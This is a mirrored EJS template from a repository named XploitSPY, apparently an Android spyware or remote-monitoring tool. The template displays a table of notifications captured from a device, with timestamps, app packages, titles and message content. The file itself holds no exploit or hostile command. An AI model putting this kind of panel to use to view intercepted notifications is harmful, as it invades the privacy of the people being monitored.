mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2024-11-05 18:09:22 +08:00
27 lines
961 B
Plaintext
27 lines
961 B
Plaintext
<div class="ui segment">
|
|
<table class="ui celled table">
|
|
<thead>
|
|
<tr>
|
|
<th>Time</th>
|
|
<th>Package</th>
|
|
<th>Content</th>
|
|
</tr>
|
|
</thead>
|
|
<tbody>
|
|
<% pageData.forEach((notification) => {
|
|
let date = new Date(parseInt(notification.postTime));
|
|
%>
|
|
<tr>
|
|
<td class="collapsing"><%= date.toLocaleString('en-GB', { timeZone: 'UTC' }) %></td>
|
|
<td class="collapsing" title="<%= notification.appName %>"><a
|
|
href="?filter=<%= notification.appName %>"><%= notification.appName.substring(0,24) %></a>
|
|
</td>
|
|
<td>
|
|
<b><%= notification.title %></b><br>
|
|
<%= notification.content %>
|
|
</td>
|
|
</tr>
|
|
<% }) %>
|
|
</tbody>
|
|
</table>
|
|
</div> |